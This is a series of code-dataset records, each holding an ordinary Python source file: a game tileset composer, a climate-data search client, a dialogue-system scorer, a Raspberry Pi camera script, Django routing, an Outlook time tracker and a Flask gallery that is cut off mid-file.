\"_{}x{}\".format(self.width, self.height))\n self.subdir_path = os.path.join(refs.source_dir, 'pngs_' + subdir_name)\n self.offset_x = self.ts_specs.get(\"sprite_offset_x\", 0)\n self.offset_y = self.ts_specs.get(\"sprite_offset_y\", 0)\n self.null_image = Vips.Image.grey(self.width, self.height)\n self.row_pngs = [\"null_image\"]\n self.filler = False\n self.fallback = False\n if self.ts_specs.get(\"fallback\"):\n self.fallback = True\n return\n if self.ts_specs.get(\"filler\"):\n self.filler = True\n return\n\n def set_first_index(self, refs):\n '''\n Increment global index and set local indexes.\n Global index can be decremented later if tilesheet does not contain\n any output images.\n '''\n refs.pngnum += 1\n self.first_index = refs.pngnum\n self.max_index = refs.pngnum\n\n def is_standard(self, refs):\n '''\n Check whether output object needs a non-standard size or offset config\n '''\n if self.offset_x or self.offset_y:\n return False\n if self.width != refs.tileset_width:\n return False\n if self.height != refs.tileset_height:\n return False\n return True\n\n def merge_row(self, refs):\n spacer = 16 - len(self.row_pngs)\n refs.pngnum += spacer\n\n in_list = []\n\n for png_pathname in self.row_pngs:\n if png_pathname == \"null_image\":\n in_list.append(self.null_image)\n else:\n vips_image = Vips.Image.pngload(png_pathname)\n try:\n if not vips_image.hasalpha():\n vips_image = vips_image.addalpha()\n except Vips.Error:\n pass\n\n try:\n if vips_image.get_typeof(\"icc-profile-data\") != 0:\n vips_image = vips_image.icc_transform(\"srgb\")\n except Vips.Error:\n pass\n\n if (vips_image.width != self.width or\n vips_image.height != self.height):\n size_msg = \"Error: {} is {}x{}, sheet sprites are {}x{}.\"\n print(size_msg.format(\n png_pathname,\n vips_image.width, vips_image.height,\n self.width, self.height))\n print(\"\\tsprites in the {}\".format(self.ts_name) +\n \" tilesheet may be resized.\")\n print(\"\\tAll sprites in a tilesheet directory\" +\n \" should have the same dimensions.\")\n global ERROR_LOGGED\n ERROR_LOGGED = True\n in_list.append(vips_image)\n for i in range(0, spacer):\n in_list.append(self.null_image)\n\n return in_list\n\n def walk_dirs(self, refs):\n tmp_merged_pngs = []\n for subdir_fpath, dirnames, filenames in os.walk(self.subdir_path):\n for filename in filenames:\n filepath = os.path.join(subdir_fpath, filename)\n if filename.endswith(\".png\"):\n pngname = filename.split(\".png\")[0]\n if (pngname in refs.pngname_to_pngnum or\n pngname == \"no_entry\"):\n print(\"skipping {}\".format(pngname))\n continue\n if self.filler and pngname in refs.pngname_to_pngnum:\n continue # TODO: option to warn\n self.row_pngs.append(filepath)\n refs.pngname_to_pngnum[pngname] = refs.pngnum\n refs.pngnum_to_pngname[refs.pngnum] = pngname\n refs.pngnum += 1\n if len(self.row_pngs) > 15:\n merged = self.merge_row(refs)\n self.row_num += 1\n self.row_pngs = []\n tmp_merged_pngs += merged\n elif filename.endswith(\".json\"):\n with open(filepath, \"r\") as fp:\n try:\n tile_entry = json.load(fp)\n except Exception:\n print(\"error loading {}\".format(filepath))\n raise\n\n if not isinstance(tile_entry, list):\n tile_entry = [tile_entry]\n self.tile_entries += tile_entry\n if self.row_pngs:\n if self.row_num == 0 and self.row_pngs == ['null_image']:\n return []\n merged = self.merge_row(refs)\n tmp_merged_pngs += merged\n return tmp_merged_pngs\n\n def create_sheet(self, merge_pngs):\n '''\n Compose and save tilesheet PNG\n '''\n if merge_pngs:\n out_image = Vips.Image.arrayjoin(merge_pngs, across=16)\n out_image.pngsave(self.output)\n\n\nif __name__ == '__main__':\n # read arguments and initialize objects\n arg_parser = argparse.ArgumentParser(description=__doc__)\n arg_parser.add_argument(\n 'source_dir',\n help='Tileset source files directory path')\n arg_parser.add_argument(\n 'output_dir', nargs='?',\n help='Output directory path')\n arg_parser.add_argument(\n '--use-all', dest='use_all', action='store_true',\n help='Add unused images with id being their basename')\n args_dict = vars(arg_parser.parse_args())\n\n source_dir = args_dict.get('source_dir')\n output_dir = args_dict.get('output_dir') or source_dir\n tileset_confpath = os.path.join(output_dir, 'tile_config.json')\n use_all = args_dict.get('use_all', False)\n\n refs = PngRefs(source_dir, output_dir)\n\n typed_ts_data = {\n \"main\": [],\n \"filler\": [],\n \"fallback\": [],\n }\n fallback_name = \"fallback.png\"\n\n # loop through tilesheets and parse all configs in subdirectories,\n #\n for subdir_index in range(1, len(refs.tileset_info)):\n ts_data = TilesheetData(subdir_index, refs)\n ts_data.set_first_index(refs)\n\n if ts_data.filler:\n ts_type = \"filler\"\n elif ts_data.fallback:\n ts_type = \"fallback\"\n else:\n ts_type = \"main\"\n\n print(\"Info: parsing {} tilesheet {}\".format(\n ts_type, ts_data.ts_name))\n if ts_type != \"fallback\":\n tmp_merged_pngs = ts_data.walk_dirs(refs)\n\n if not tmp_merged_pngs:\n # no images in the tilesheet, revert pngnum\n refs.pngnum -= 1\n continue\n\n # write output PNGs\n ts_data.create_sheet(tmp_merged_pngs)\n\n ts_data.max_index = refs.pngnum\n\n typed_ts_data[ts_type].append(ts_data)\n\n # combine config data in correct order\n all_ts_data = typed_ts_data[\"main\"] + typed_ts_data[\"filler\"] \\\n + typed_ts_data[\"fallback\"]\n\n # preparing \"tiles-new\", but remembering max index of each sheet in keys\n tiles_new_dict = dict()\n\n for ts_data in all_ts_data:\n if ts_data.fallback:\n fallback_name = ts_data.ts_name\n continue\n ts_tile_entries = []\n\n for tile_entry in ts_data.tile_entries:\n converted_tile_entry = refs.convert_tile_entry(\n tile_entry, \"\", ts_data.filler)\n if converted_tile_entry:\n ts_tile_entries.append(converted_tile_entry)\n\n ts_conf = {\n \"file\": ts_data.ts_name,\n \"tiles\": ts_tile_entries,\n \"//\": \"range {} to {}\".format(\n ts_data.first_index, ts_data.max_index)\n }\n\n if not ts_data.is_standard(refs):\n ts_conf[\"sprite_width\"] = ts_data.width\n ts_conf[\"sprite_height\"] = ts_data.height\n ts_conf[\"sprite_offset_x\"] = ts_data.offset_x\n ts_conf[\"sprite_offset_y\"] = ts_data.offset_y\n\n tiles_new_dict[ts_data.max_index] = ts_conf\n\n # fing unused images\n unused = refs.find_unused(use_all)\n\n # unused list must be empty without use_all\n for bare_png in unused:\n bare_num = refs.pngname_to_pngnum[bare_png]\n previous_max = 0\n for ts_max_index in tiles_new_dict.keys():\n if previous_max < bare_num < ts_max_index:\n tiles_new_dict[ts_max_index]['tiles'].append(\n {'id': bare_png.split(\".png\")[0],\n 'fg': bare_num})\n break\n previous_max = ts_max_index\n\n # finalizing \"tiles-new\" config\n tiles_new = [v for v in tiles_new_dict.values()]\n\n FALLBACK[\"file\"] = fallback_name\n tiles_new.append(FALLBACK)\n conf_data = {\n \"tile_info\": [{\n \"width\": refs.tileset_width,\n \"height\": refs.tileset_height\n }],\n \"tiles-new\": tiles_new\n }\n\n # save the config\n write_to_json(tileset_confpath, conf_data)\n\n if ERROR_LOGGED:\n sys.exit(1)\n","repo_name":"AlexMooney/Cataclysm-DDA","sub_path":"tools/gfx_tools/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":17150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"71068641747","text":"\"\"\"\n\nModule :mod:`pyesgf.search.results`\n===================================\n\nSearch results are retrieved through the :class:`ResultSet` class. This class\nhides paging of large result sets behind a client-side cache. Subclasses of\n:class:`Result` represent results of different SOLr record type.\n\n\"\"\"\n\nfrom collections import defaultdict\nfrom collections.abc import Sequence\nimport re\n\nfrom .consts import (DEFAULT_BATCH_SIZE, TYPE_DATASET, TYPE_FILE,\n TYPE_AGGREGATION)\n\n\nclass ResultSet(Sequence):\n \"\"\"\n :ivar context: The search context object used to generate this resultset\n :property batch_size: The number of results that will be requested\n from esgf-search as one call. This must be set on creation and\n cannot change.\n\n \"\"\"\n def __init__(self, context, batch_size=DEFAULT_BATCH_SIZE, eager=True):\n \"\"\"\n :param context: The search context object used to generate this\n resultset\n :param batch_size: The number of results that will be requested from\n esgf-search as one call.\n :param eager: Boolean specifying whether to retrieve the first batch on\n instantiation.\n \"\"\"\n self.context = context\n self.__batch_size = batch_size\n self.__batch_cache = {}\n self.__len_cache = None\n if eager:\n self.__get_batch(0)\n\n def __getitem__(self, index):\n batch_i = index // self.batch_size\n offset = index % self.batch_size\n batch = self.__get_batch(batch_i)\n\n search_type = self.context.search_type\n ResultClass = _result_classes[search_type]\n\n # !TODO: should probably wrap the json inside self.__batch_cache\n return ResultClass(batch[offset], self.context)\n\n def __len__(self):\n if self.__len_cache is None:\n self.__get_batch(0)\n return self.__len_cache\n\n @property\n def batch_size(self):\n return self.__batch_size\n\n def _build_result(self, result):\n \"\"\"\n Construct a result object from the raw json.\n\n This method is designed to be overridden in subclasses if desired.\n The default implementation simply returns the json.\n\n \"\"\"\n return result\n\n def __get_batch(self, batch_i):\n if batch_i in self.__batch_cache:\n return self.__batch_cache[batch_i]\n\n offset = self.batch_size * batch_i\n limit = self.batch_size\n\n query_dict = self.context._build_query()\n response = (self.context.connection\n .send_search(query_dict, limit=limit, offset=offset,\n shards=self.context.shards))\n\n if self.__len_cache is None:\n self.__len_cache = response['response']['numFound']\n\n # !TODO: strip out results\n batch = response['response']['docs']\n\n self.__batch_cache[batch_i] = batch\n return batch\n\n\nclass BaseResult(object):\n \"\"\"\n Base class for results.\n\n Subclasses represent different search types such as File and Dataset.\n\n :ivar json: The original json representation of the result.\n :ivar context: The SearchContext which generated this result.\n :property urls: a dictionary of the form\n ``{service: [(url, mime_type), ...], ...}``\n :property opendap_url: The url of an OPeNDAP endpoint for this result\n if available\n :property las_url: The url of an LAS endpoint for this result if available\n :property download_url: The url for downloading the result by HTTP\n if available\n :property gridftp_url: The url for downloading the result by Globus\n if available\n :property globus_url: The url for downloading the result by Globus\n if available (including endpoint)\n :property index_node: The index node from where the metadata is stored.\n Calls to ``*_context()`` will optimise queries to only address this node.\n\n \"\"\"\n def __init__(self, json, context):\n self.json = json\n self.context = context\n\n @property\n def urls(self):\n url_dict = defaultdict(list)\n for encoded in self.json['url']:\n url, mime_type, service = encoded.split('|')\n url_dict[service].append((url, mime_type))\n\n return url_dict\n\n @property\n def opendap_url(self):\n try:\n url, mime = self.urls['OPENDAP'][0]\n except (KeyError, IndexError):\n return None\n\n url = re.sub(r'.html$', '', url)\n\n return url\n\n @property\n def las_url(self):\n try:\n url, mime = self.urls['LAS'][0]\n except (KeyError, IndexError):\n return None\n\n return url\n\n @property\n def download_url(self):\n try:\n url, mime = self.urls['HTTPServer'][0]\n except (KeyError, IndexError):\n return None\n\n return url\n\n @property\n def gridftp_url(self):\n try:\n url, mime = self.urls['GridFTP'][0]\n except (KeyError, IndexError):\n return None\n\n return url\n\n @property\n def globus_url(self):\n try:\n url, mime = self.urls['Globus'][0]\n except (KeyError, IndexError):\n return None\n\n return url\n\n @property\n def index_node(self):\n try:\n index_node = self.json['index_node']\n except KeyError:\n return None\n\n return index_node\n\n\nclass DatasetResult(BaseResult):\n \"\"\"\n A result object for ESGF datasets.\n\n :property dataset_id: The solr dataset_id which is unique throughout the\n system.\n\n \"\"\"\n\n @property\n def dataset_id(self):\n # !TODO: should we decode this into a tuple?\n # self.json['id'].split('|')\n return self.json['id']\n\n @property\n def number_of_files(self):\n \"\"\"\n Returns file count as reported by the dataset record.\n \"\"\"\n return self.json['number_of_files']\n\n def file_context(self):\n \"\"\"\n Return a SearchContext for searching for files within this dataset.\n \"\"\"\n from .context import FileSearchContext\n\n if self.context.connection.distrib:\n # If the index node is in the available shards for this connection\n # then restrict shards to that node. Otherwise do nothing to\n # handle the case when the shard is replicated\n available_shards = list(self.context.connection.get_shard_list().keys())\n if self.index_node in available_shards:\n shards = [self.index_node]\n else:\n shards = None\n else:\n shards = None\n\n files_context = FileSearchContext(\n connection=self.context.connection,\n constraints={'dataset_id': self.dataset_id},\n shards=shards,\n )\n return files_context\n\n def aggregation_context(self):\n \"\"\"\n Return a SearchContext for searching for aggregations within this\n dataset.\n \"\"\"\n from .context import AggregationSearchContext\n\n if self.context.connection.distrib:\n # If the index node is in the available shards for this connection\n # then restrict shards to that node. Otherwise do nothing to\n # handle the case when the shard is replicated\n available_shards = list(self.context.connection.get_shard_list().keys())\n if self.index_node in available_shards:\n shards = [self.index_node]\n else:\n shards = None\n else:\n shards = None\n\n agg_context = AggregationSearchContext(\n connection=self.context.connection,\n constraints={'dataset_id': self.dataset_id},\n shards=shards,\n )\n return agg_context\n\n\nclass FileResult(BaseResult):\n \"\"\"\n A result object for ESGF files. Properties from :class:`BaseResult` are\n inherited.\n\n :property file_id: The identifier for the file\n :property checksum: The checksum of the file\n :property checksum_type: The algorithm used for generating the checksum\n :property filename: The filename\n :property size: The file size in bytes\n\n \"\"\"\n @property\n def file_id(self):\n return self.json['id']\n\n @property\n def checksum(self):\n try:\n return self.json['checksum'][0]\n except KeyError:\n return None\n\n @property\n def checksum_type(self):\n try:\n return self.json['checksum_type'][0]\n except KeyError:\n return None\n\n @property\n def filename(self):\n return self.json['title']\n\n @property\n def size(self):\n return int(self.json['size'])\n\n @property\n def tracking_id(self):\n try:\n return self.json['tracking_id'][0]\n except KeyError:\n return None\n\n\nclass AggregationResult(BaseResult):\n \"\"\"\n A result object for ESGF aggregations. Properties from :class:`BaseResult`\n are inherited.\n\n :property aggregation_id: The aggregation id\n \"\"\"\n @property\n def aggregation_id(self):\n return self.json['id']\n\n\n_result_classes = {\n TYPE_DATASET: DatasetResult,\n TYPE_FILE: FileResult,\n TYPE_AGGREGATION: AggregationResult,\n }\n","repo_name":"ESGF/esgf-pyclient","sub_path":"pyesgf/search/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":9480,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"} +{"seq_id":"39799939284","text":"from dataset_walker import DatasetWalker\n\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom nltk.translate.meteor_score import single_meteor_score\nfrom rouge import Rouge \n\nimport re\n\nimport sys\nimport json\nimport argparse\n\nRE_ART = re.compile(r'\\b(a|an|the)\\b')\nRE_PUNC = re.compile(r'[!\"#$%&()*+,-./:;<=>?@\\[\\]\\\\^`{|}~_\\']')\n\nclass Metric:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self._detection_tp = 0.0\n self._detection_fp = 0.0\n self._detection_tn = 0.0\n self._detection_fn = 0.0\n \n self._selection_mrr5 = 0.0\n self._selection_r1 = 0.0\n self._selection_r5 = 0.0\n\n self._generation_bleu1 = 0.0\n self._generation_bleu2 = 0.0\n self._generation_bleu3 = 0.0\n self._generation_bleu4 = 0.0\n self._generation_meteor = 0.0\n self._generation_rouge_1 = 0.0\n self._generation_rouge_2 = 0.0\n self._generation_rouge_l = 0.0\n\n def _match(self, ref_knowledge, pred_knowledge):\n result = []\n for pred in pred_knowledge:\n matched = False\n for ref in ref_knowledge:\n if pred['domain'] == ref['domain'] and pred['entity_id'] == ref['entity_id'] and pred['doc_id'] == ref['doc_id']:\n matched = True\n result.append(matched)\n return result\n \n def _reciprocal_rank(self, ref_knowledge, hyp_knowledge, k=5):\n relevance = self._match(ref_knowledge, hyp_knowledge)[:k]\n\n if True in relevance:\n idx = relevance.index(True)\n result = 1.0/(idx+1)\n else:\n result = 0.0\n\n return result\n\n def _recall_at_k(self, ref_knowledge, hyp_knowledge, k=5):\n relevance = self._match(ref_knowledge, hyp_knowledge)[:k]\n\n if True in relevance:\n result = 1.0\n else:\n result = 0.0\n\n return result\n\n def _normalize_text(self, text):\n result = text.lower()\n result = RE_PUNC.sub(' ', result)\n result = RE_ART.sub(' ', result)\n result = ' '.join(result.split())\n\n return result\n \n def _bleu(self, ref_response, hyp_response, n=4):\n ref_tokens = self._normalize_text(ref_response).split()\n hyp_tokens = self._normalize_text(hyp_response).split()\n\n weights = [1.0/n] * n\n \n score = sentence_bleu([ref_tokens], hyp_tokens, weights)\n\n return score\n\n def _meteor(self, ref_response, hyp_response):\n score = single_meteor_score(ref_response, hyp_response, self._normalize_text)\n\n return score\n\n def _rouge(self, ref_response, hyp_response, mode='l'):\n ref_response = self._normalize_text(ref_response)\n hyp_response = self._normalize_text(hyp_response)\n\n rouge = Rouge()\n\n if mode == 'l':\n score = rouge.get_scores(hyp_response, ref_response)[0]['rouge-l']['f']\n elif mode == 1:\n score = rouge.get_scores(hyp_response, ref_response)[0]['rouge-1']['f']\n elif mode == 2:\n score = rouge.get_scores(hyp_response, ref_response)[0]['rouge-2']['f']\n else:\n raise ValueError(\"unsupported mode: %s\" % mode)\n\n return score\n\n \n def update(self, ref_obj, hyp_obj):\n if ref_obj['target'] is True:\n if hyp_obj['target'] is True:\n self._detection_tp += 1\n \n self._selection_mrr5 += self._reciprocal_rank(ref_obj['knowledge'], hyp_obj['knowledge'], 5)\n self._selection_r1 += self._recall_at_k(ref_obj['knowledge'], hyp_obj['knowledge'], 1)\n self._selection_r5 += self._recall_at_k(ref_obj['knowledge'], hyp_obj['knowledge'], 5)\n\n self._generation_bleu1 += self._bleu(ref_obj['response'], hyp_obj['response'], 1)\n self._generation_bleu2 += self._bleu(ref_obj['response'], hyp_obj['response'], 2)\n self._generation_bleu3 += self._bleu(ref_obj['response'], hyp_obj['response'], 3)\n self._generation_bleu4 += self._bleu(ref_obj['response'], hyp_obj['response'], 4)\n self._generation_meteor += self._meteor(ref_obj['response'], hyp_obj['response'])\n self._generation_rouge_l += self._rouge(ref_obj['response'], hyp_obj['response'], 'l')\n self._generation_rouge_1 += self._rouge(ref_obj['response'], hyp_obj['response'], 1)\n self._generation_rouge_2 += self._rouge(ref_obj['response'], hyp_obj['response'], 2) \n else:\n self._detection_fn += 1\n else:\n if hyp_obj['target'] is True:\n self._detection_fp += 1\n else:\n self._detection_tn += 1\n\n def _compute(self, score_sum):\n if self._detection_tp + self._detection_fp > 0.0:\n score_p = score_sum/(self._detection_tp + self._detection_fp)\n else:\n score_p = 0.0\n\n if self._detection_tp + self._detection_fn > 0.0:\n score_r = score_sum/(self._detection_tp + self._detection_fn)\n else:\n score_r = 0.0\n\n if score_p + score_r > 0.0:\n score_f = 2*score_p*score_r/(score_p+score_r)\n else:\n score_f = 0.0\n\n return (score_p, score_r, score_f)\n \n def scores(self):\n detection_p, detection_r, detection_f = self._compute(self._detection_tp)\n \n selection_mrr5_p, selection_mrr5_r, selection_mrr5_f = self._compute(self._selection_mrr5)\n selection_r1_p, selection_r1_r, selection_r1_f = self._compute(self._selection_r1)\n selection_r5_p, selection_r5_r, selection_r5_f = self._compute(self._selection_r5)\n\n generation_bleu1_p, generation_bleu1_r, generation_bleu1_f = self._compute(self._generation_bleu1)\n generation_bleu2_p, generation_bleu2_r, generation_bleu2_f = self._compute(self._generation_bleu2)\n generation_bleu3_p, generation_bleu3_r, generation_bleu3_f = self._compute(self._generation_bleu3)\n generation_bleu4_p, generation_bleu4_r, generation_bleu4_f = self._compute(self._generation_bleu4)\n generation_meteor_p, generation_meteor_r, generation_meteor_f = self._compute(self._generation_meteor)\n generation_rouge_l_p, generation_rouge_l_r, generation_rouge_l_f = self._compute(self._generation_rouge_l)\n generation_rouge_1_p, generation_rouge_1_r, generation_rouge_1_f = self._compute(self._generation_rouge_1)\n generation_rouge_2_p, generation_rouge_2_r, generation_rouge_2_f = self._compute(self._generation_rouge_2)\n\n scores = {\n 'detection': {\n 'prec': detection_p,\n 'rec': detection_r,\n 'f1': detection_f\n },\n 'selection': {\n 'mrr@5': selection_mrr5_f,\n 'r@1': selection_r1_f,\n 'r@5': selection_r5_f,\n },\n 'generation': {\n 'bleu-1': generation_bleu1_f,\n 'bleu-2': generation_bleu2_f,\n 'bleu-3': generation_bleu3_f,\n 'bleu-4': generation_bleu4_f,\n 'meteor': generation_meteor_f,\n 'rouge_1': generation_rouge_1_f,\n 'rouge_2': generation_rouge_2_f,\n 'rouge_l': generation_rouge_l_f\n }\n }\n\n return scores\n \ndef main(argv):\n parser = argparse.ArgumentParser(description='Evaluate the system outputs.')\n\n parser.add_argument('--dataset', dest='dataset', action='store', metavar='DATASET', choices=['train', 'val', 'test'], required=True, help='The dataset to analyze')\n parser.add_argument('--dataroot',dest='dataroot',action='store', metavar='PATH', required=True,\n help='Will look for corpus in //...')\n parser.add_argument('--outfile',dest='outfile',action='store',metavar='JSON_FILE',required=True,\n help='File containing output JSON')\n parser.add_argument('--scorefile',dest='scorefile',action='store',metavar='JSON_FILE',required=True,\n help='File containing scores')\n\n args = parser.parse_args()\n\n with open(args.outfile, 'r') as f:\n output = json.load(f)\n \n data = DatasetWalker(dataroot=args.dataroot, dataset=args.dataset, labels=True)\n\n metric = Metric()\n\n for (instance, ref), pred in zip(data, output):\n metric.update(ref, pred)\n \n scores = metric.scores()\n\n with open(args.scorefile, 'w') as out:\n json.dump(scores, out, indent=2)\n \n\nif __name__ ==\"__main__\":\n main(sys.argv) \n","repo_name":"alexa/alexa-with-dstc9-track1-dataset","sub_path":"scripts/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"48"} +{"seq_id":"72275306067","text":"from datetime import datetime\nfrom picamera import PiCamera # it will work in raspi\ncam = PiCamera() # open the camera\n#cam.capture(current_time+'.jpg')\n#cam.close()\n\nimport time\n\nimport getch\nwhile True:\n char = getch.getch()\n key_val = ord(char)\n print('key_val: ',key_val,' type: ',type(key_val))\n now=datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n if key_val ==46: # here works for . (dot)\n print('printing time: ',current_time)\n cam.capture(current_time+'.jpg')\n print('capture done')\n\n # print('I am doing job as the key val is: ',key_val)\n else:\n print('I have to quit as the key val is: ',key_val)\n cam.close()\n break","repo_name":"atifkarim/problem_solving","sub_path":"python_practise/capture_image_with_key_RasPI.py","file_name":"capture_image_with_key_RasPI.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73824523345","text":"def max_in_list(ls):\n largest = ls[0]\n for x in ls:\n if x>largest:\n largest = x\n return largest\ndef find_longest_word(a):\n return max_in_list(a)\n\n#reads words\nlis = []\nn = int(input('Enter Number of elements in list:'))\nfor x in range(n):\n lis.append(input('Enter Values:'))\n#lengths of words\nsize = []\nfor x in lis:\n size.append(len(x))\nprint(list(zip(lis,size)))\nprint(find_longest_word(size))\n","repo_name":"arjun921/Python-TIL","sub_path":"misc/classPracticals/15LongestWord.py","file_name":"15LongestWord.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25287160487","text":"\"\"\"WebMonitor URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.views.static import serve\n\nfrom rest_framework_jwt.views import obtain_jwt_token\nfrom WebMonitor import settings\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api_auth/', include('rest_framework.urls', namespace='rest_framework')),\n # media配置--配合settings中的MEDIA_ROOT的配置,就可以在浏览器的地址栏访问media文件夹及里面的文件了\n re_path(r'media/(?P.*)$',serve,{'document_root':settings.MEDIA_ROOT}),\n]\n\n# drf_yasg ---------------------------------------\n# 所有需要展示在接口交互界面中的接口url都写在此处\nschema_url_patterns =[\n path('login/', obtain_jwt_token), #jwt登录认证接口 http://127.0.0.1:8000/login/\n path('users/', include('apps.users.urls', namespace=\"users\")), # users/\n path('monitor/', include('apps.monitor.urls', namespace=\"monitor\")), # monitor/\n path('alarm/', include('apps.alarm.urls', namespace=\"alarm\")), # alarm/\n path('flight/', include('apps.flight.urls', namespace=\"flight\")), # flight/\n path('task/', include('apps.task.urls', namespace=\"task\")), # task/\n]\n\nurlpatterns += schema_url_patterns\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"机场人员流动监测系统 API\",\n default_version='v1',\n description=\"机场人员流动监测系统数据接口页面 \\n 用户信息管理、日志管理、数据监测、场景管理、权限管理等\",\n terms_of_service=\"http://www.briup.com\",\n contact=openapi.Contact(email=\"chengzy@briup.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=False,\n permission_classes=(permissions.AllowAny,),\n patterns= schema_url_patterns\n)\n\n# http://127.0.0.1:8000/swagger/\nurlpatterns += [\n # path('swagger(?P\\.json|\\.yaml)', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n]\n","repo_name":"CSUliver/InternProject","sub_path":"WebMonitor/WebMonitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7079949289","text":"from utils import prtWarning, prtInfo\r\n\r\nMISSION_SPENT_TIME_STR = \"mission_spent_time\"\r\nTOTAL_STR = \"total\"\r\nUNKNOWN_CATEGORY_STR = \"UNKNOWN_CATEGORY\"\r\nDATES_STR = \"dates\"\r\n\r\n\r\nclass DataModel:\r\n \"\"\"\r\n This class represents the Data Model of the Outlook events\r\n \"\"\"\r\n\r\n def __init__(self, events):\r\n self.events = events\r\n self.time_per_mission = {}\r\n self.ratio_per_mission = {}\r\n\r\n def show_events(self):\r\n prtInfo(\"\\n*** Events fetched ***\")\r\n for idx, event in enumerate(self.events):\r\n print(f\"Event[{idx}] : {event}\")\r\n if len(event.categories) == 0:\r\n category = UNKNOWN_CATEGORY_STR\r\n else:\r\n category = event.categories[0]\r\n print(f\"\\tCategory : {category}\")\r\n print(f\"\\tSpent time : {self.diff_time_spent(event)}\")\r\n\r\n def show_time_per_mission(self):\r\n prtInfo(\"\\n*** Time per mission table ***\")\r\n for day, value in self.time_per_mission.items():\r\n print(f\"* Day {day} - Total in hours ({value[TOTAL_STR]}) :\")\r\n for mission, time_spent in value[MISSION_SPENT_TIME_STR].items():\r\n print(f\"\\t* Mission '{mission}' - Time spent in hours : {time_spent}\")\r\n\r\n def show_ratio_per_mission(self):\r\n prtInfo(\"\\n*** Ratio per mission table ***\")\r\n for mission, value in self.ratio_per_mission.items():\r\n print(f\"* Mission {mission} - Total in hours ({value[TOTAL_STR]}) :\")\r\n for date, ratio in value[DATES_STR].items():\r\n print(f\"\\t* Date '{date}' - Time spent in hours : {ratio}\")\r\n\r\n def sort_events(self) -> list:\r\n\r\n if not self.events:\r\n prtWarning(\"Events list empty.\")\r\n else:\r\n sorted_events = []\r\n for event in self.events:\r\n sorted_events.append(event)\r\n sorted_events.sort(key=lambda x: x.start)\r\n\r\n self.events = sorted_events\r\n\r\n return self.events\r\n\r\n def compute_time_spent(self) -> dict:\r\n \"\"\" Compute the mission ratios per day\r\n\r\n :return:\r\n Ex :\r\n { \"1\" : { \"mission_spent_time\" : {\"MissionX\" : 2, \"MissionY\" : 2}, \"Total\" : 4 } },\r\n \"2\" : : { \"MissionX\" : 4}, \"Total\" : 4 } }\r\n }\r\n \"\"\"\r\n tpm = self.time_per_mission\r\n for event in self.events:\r\n day = event.start.strftime(\"%d/%m/%y\")\r\n day = str(day)\r\n if len(event.categories) == 0:\r\n category = UNKNOWN_CATEGORY_STR\r\n else:\r\n category = event.categories[0]\r\n time_spent = self.diff_time_spent(event)\r\n if day in tpm:\r\n if category in tpm[day][MISSION_SPENT_TIME_STR]:\r\n self.time_per_mission[day][MISSION_SPENT_TIME_STR][category] += time_spent\r\n self.time_per_mission[day][TOTAL_STR] += time_spent\r\n else:\r\n self.time_per_mission[day][MISSION_SPENT_TIME_STR][category] = time_spent\r\n self.time_per_mission[day][TOTAL_STR] += time_spent\r\n else:\r\n tpm[day] = {MISSION_SPENT_TIME_STR: {category: time_spent}, TOTAL_STR: time_spent}\r\n\r\n return tpm\r\n\r\n def compute_ratios(self) -> dict:\r\n\r\n tpm = self.time_per_mission\r\n rpm = self.ratio_per_mission\r\n for day in tpm.keys():\r\n for mission_key, mission_value in tpm[day][MISSION_SPENT_TIME_STR].items():\r\n ratio = mission_value / tpm[day][TOTAL_STR]\r\n if mission_key in rpm.keys():\r\n rpm[mission_key][DATES_STR][day] = ratio\r\n rpm[mission_key][TOTAL_STR] += ratio\r\n else:\r\n rpm[mission_key] = {DATES_STR: {day: ratio}, TOTAL_STR: ratio}\r\n\r\n return rpm\r\n\r\n @staticmethod\r\n def diff_time_spent(event) -> int:\r\n time_spent = event.end - event.start\r\n return time_spent.seconds / 3600\r\n","repo_name":"LaurentMesguen/Orcaro","sub_path":"data_model.py","file_name":"data_model.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10574740940","text":"from flask import Flask, render_template, url_for\nfrom vacations import fetch_vacations_items\n\nvacation_folders = fetch_vacations_items()\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home_route():\n return render_template('index.html', rows=vacation_folders)\n\n\n@app.route('/view_gallery/')\ndef view_gallery(name, folder):\n import glob # fetching photos from correct folder\n import re # regular expressions\n pathname = \"static/images/{x}/*\".format(x=folder)\n globbed_photos = glob.glob(pathname)\n\n final_photos = []\n for pic in globbed_photos:\n x = re.split(\"/\", pic)\n path = 